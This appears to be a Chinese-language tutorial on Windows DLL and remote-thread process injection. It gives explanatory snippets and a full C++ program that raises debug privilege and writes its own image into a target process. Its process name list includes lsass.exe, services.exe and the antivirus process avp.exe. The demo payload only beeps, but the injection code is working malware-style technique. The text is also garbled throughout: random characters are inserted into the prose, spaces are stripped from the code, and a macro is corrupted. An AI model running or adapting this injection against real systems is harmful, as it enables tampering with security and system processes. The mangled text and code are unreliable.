? ? ? 所謂DLL注入就是將一個DLL放進某個進程的地址空間里塞关，讓它成為那個進程的一部分优妙。要實現(xiàn)DLL注入逻淌，首先需要打開目標(biāo)進程惜纸。

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|//允許遠程創(chuàng)建線程

PROCESS_VM_OPERATION|//允許遠程VM操作

PROCESS_VM_WRITE,//允許遠程VM寫

FALSE,dwRemoteProcessId)

由于我們后面需要寫入遠程進程的內(nèi)存地址空間并建立遠程線程跳纳，所以需要申請足夠的權(quán)限（PROCESS_CREATE_THREAD忍饰、VM_OPERATION、VM_WRITE）寺庄。

如果進程打不開艾蓝，以后的操作就別想了。進程打開后斗塘，就可以建立遠線程了赢织，不過別急，先想想這個遠線程的線程函數(shù)是什么馍盟？我們的目的是注入一個DLL于置。而且我們知道用LoadLibrary可以加載一個DLL到本進程的地址空間。于是贞岭，自然會想到如果可以在目標(biāo)進程中調(diào)用LoadLibrary八毯，不就可以把DLL加載到目標(biāo)進程的地址空間了嗎？對瞄桨！就是這樣话速。遠線程就在這兒用了一次，建立的遠線程的線程函數(shù)就是LoadLibrary芯侥，而參數(shù)就是要注入的DLL的文件名泊交。(這里需要自己想一想，注意到了嗎柱查，線程函數(shù)ThreadProc和LoadLibrary函數(shù)非常相似廓俭，返回值，參數(shù)個數(shù)都一樣)還有一個問題物赶，LoadLibrary這個函數(shù)的地址在哪兒白指？也許你會說，這個簡單酵紫，GetProcAddress就可以得出告嘲。于是代碼就出來了错维。

char*pszLibFileRemote="my.dll";

PTHREAD_START_ROUTINEpfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32"),"LoadLibraryA");

CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL);

但是不對！不要忘了橄唬，這是遠線程赋焕，不是在你的進程里，而pszLibFileRemote指向的是你的進程里的數(shù)據(jù)仰楚，到了目標(biāo)進程隆判，這個指針都不知道指向哪兒去了，同樣pfnStartAddr這個地址上的代碼到了目標(biāo)進程里也不知道是什么了僧界，不知道是不是你想要的LoadLibraryA了侨嘀。但是，問題總是可以解決的捂襟，Windows有些很強大的API函數(shù)咬腕，他們可以在目標(biāo)進程里分配內(nèi)存，可以將你的進程中的數(shù)據(jù)拷貝到目標(biāo)進程中葬荷。因此pszLibFileRemote的問題可以解決了涨共。

char*pszLibFileName="my.dll";//注意，這個一定要是全路徑文件名宠漩，除非它在系統(tǒng)目錄里举反；原因大家自己想想。

//計算DLL路徑名需要的內(nèi)存空間

intcb=(1+lstrlenA(pszLibFileName))*sizeof(char);

//使用VirtualAllocEx函數(shù)在遠程進程的內(nèi)存地址空間分配DLL文件名緩沖區(qū)

pszLibFileRemote=(char*)VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);

//使用WriteProcessMemory函數(shù)將DLL的路徑名復(fù)制到遠程進程的內(nèi)存空間

iReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszLibFileName,cb,NULL);

OK扒吁，現(xiàn)在目標(biāo)進程也認識pszLibFileRemote了火鼻，但是pfnStartAddr好像不好辦，我怎么可能知道LoadLibraryA在目標(biāo)進程中的地址呢瘦陈？其實Windows為我們解決了這個問題凝危，LoadLibraryA這個函數(shù)是在Kernel32.dll這個核心DLL里的，而這個DLL很特殊晨逝，不管對于哪個進程，Windows總是把它加載到相同的地址上去懦铺。因此你的進程中LoadLibraryA的地址和目標(biāo)進程中LoadLibraryA的地址是相同的(其實捉貌，這個DLL里的所有函數(shù)都是如此)。至此冬念，DLL注入結(jié)束了趁窃。

[cpp]

/*

遠程注入explorer.exe，不停Beep,注入完就退出急前。

*/

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>

#include<Shlwapi.h>

#include<tchar.h>

#pragmacomment(lib,"Shlwapi.lib")

#pragmacomment(linker,"/BASE:0x14000000")

//#defineNoWindow

#ifdefNoWindow

#pragmacomment(linker,"/subsystem:windows/FILEALIGN:0x200/ENTRY:main")

#pragmacomment(linker,"/INCREMENTAL:NO/IGNORE:4078")

#pragmacomment(linker,"/MERGE:.idata=.text/MERGE:.data=.text/MERGE:.rdata=.text/MERGE:.text=Anskya/SECTION:Anskya,EWR")

#endif

typedefint(__stdcall*fnMessageBoxA)(HWND,LPCSTR,LPCSTR,UINT);

typedefint(__stdcall*fnBeep)(int,int);

#defineProcessName"services.exe"http://"rundll32.exe"http://"svchost.exe"http://"explorer.exe"http://"avp.exe"http://"lsass.exe"http://

//

//根據(jù)進程名醒陆，獲得進程ID

DWORDGetProcessID(char*FileName)

{

HANDLEhProcess;

PROCESSENTRY32pe;

BOOLbRet;

//進行進程快照

hProcess=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//開始進程查找

bRet=::Process32First(hProcess,&pe);

//循環(huán)比較，得出ProcessID

while(bRet)

{

if(strcmp(FileName,pe.szExeFile)==0)

returnpe.th32ProcessID;

else

bRet=::Process32Next(hProcess,&pe);

}

//返回得到的ProcessID

//printf("Processnotfound!\n");

return9999;

}

//

//遠程注入函數(shù)www.2cto.com

void__stdcallRmoteThread()

{

HMODULEhMod,hMod2;

fnMessageBoxAmyMessageBoxA;

fnBeepmyBeep;

char*path[MAX_PATH];

hMod=GetModuleHandle("user32.dll");

hMod2=GetModuleHandle("kernel32.dll");

myMessageBoxA=(fnMessageBoxA)GetProcAddress(hMod,(LPCSTR)"MessageBoxA");

myBeep=(fnBeep)GetProcAddress(hMod2,(LPCSTR)"Beep");

/*for(inti=0;i<30;i++)

{

myBeep(800,400);

}

*/

//while(1)

for(inti=0;i<6;i++)

{

Beep(600,100);

Sleep(200);

}

GetModuleFileName(NULL,(char*)path,MAX_PATH);

//myMessageBoxA(NULL,(char*)path,NULL,64);

}

//

//提升應(yīng)用級調(diào)試權(quán)限

BOOLEnablePrivilege(HANDLEhToken,LPCTSTRszPrivName,BOOLfEnable)

{

TOKEN_PRIVILEGEStp;

tp.PrivilegeCount=1;

LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);

tp.Privileges[0].Attributes=fEnable?SE_PRIVILEGE_ENABLED:0;

AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);

return((GetLastError()==ERROR_SUCCESS));

}

//

///說明:插入代碼,遠程線程為RmoteThread()

///參數(shù):Pid=進程PID

///返回:成功True,否則False

boolInjectExe(DWORDPid)

{

boolstatus=false;

LPVOIDpBaseAddr=NULL;

HMODULEhMod=GetModuleHandle(NULL);

LONGhNHOffset=PIMAGE_DOS_HEADER(hMod)->e_lfanew;

HANDLEhThread,

hProcess,

hToken;

DWORDcbImage;

//cbImage=內(nèi)存中整個PE映像體的尺寸

cbImage=PIMAGE_NT_HEADERS((DWORD)hMod+(DWORD)hNHOffset)->OptionalHeader.SizeOfImage;

//重要裆针，否則不能注入lsass

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);

EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);

hProcess=OpenProcess(PROCESS_ALL_ACCESS,TRUE,Pid);

if(hProcess==NULL)

{

#ifdefdebug

MessageBoxA(NULL,"錯誤OpenProcess",NULL,64);

#endif

gotoErr;

}

//釋放遠程內(nèi)存

VirtualFreeEx(hProcess,LPVOID(hMod),0,MEM_RELEASE);

//分配遠程內(nèi)存

pBaseAddr=VirtualAllocEx(hProcess,LPVOID(hMod),cbImage,MEM_COMMIT|MEM_RESERVE,

PAGE_EXECUTE_READWRITE);

if(pBaseAddr==NULL)

{

#ifdefdebug

MessageBoxA(NULL,"VirtualAllocExfailed",NULL,64);

#endif

gotoErr;

}

//寫進去,將本進程的整個PE體全寫進目標(biāo)進程刨摩，夠狠～

if(!WriteProcessMemory(hProcess,pBaseAddr,LPVOID(hMod),cbImage,NULL))

{

#ifdefdebug

MessageBoxA(NULL,"WriteProcessMemoryfailed",NULL,64);

#endif

gotoErr;

}

hThread=CreateRemoteThread(hProcess,NULL,NULL,\

(LPTHREAD_START_ROUTINE)&RmoteThread,NULL,NULL,NULL);

if(hThread==NULL)

{

#ifdefdebug

MessageBoxA(NULL,"CreateRemoteThreadfailed",NULL,64);

#endif

gotoErr;

}

//WaitForSingleObject(hThread,INFINITE);

CloseHandle(hThread);

CloseHandle(hProcess);

status=TRUE;

returnstatus;//自己返回就行寺晌，不要VirtualFreeEx;，否則宿主就掛了!

Err:

if(pBaseAddr!=NULL)

VirtualFreeEx(hProcess,pBaseAddr,0,MEM_RELEASE);

if(hProcess!=NULL)

CloseHandle(hProcess);

returnstatus;

}

//

intmain()

{

charaa[]="aBcDdddFFFFasfd";

strupr((char*)aa);

printf(aa);

if(!InjectExe(GetProcessID(ProcessName)))

Beep(1800,500);

return0;

}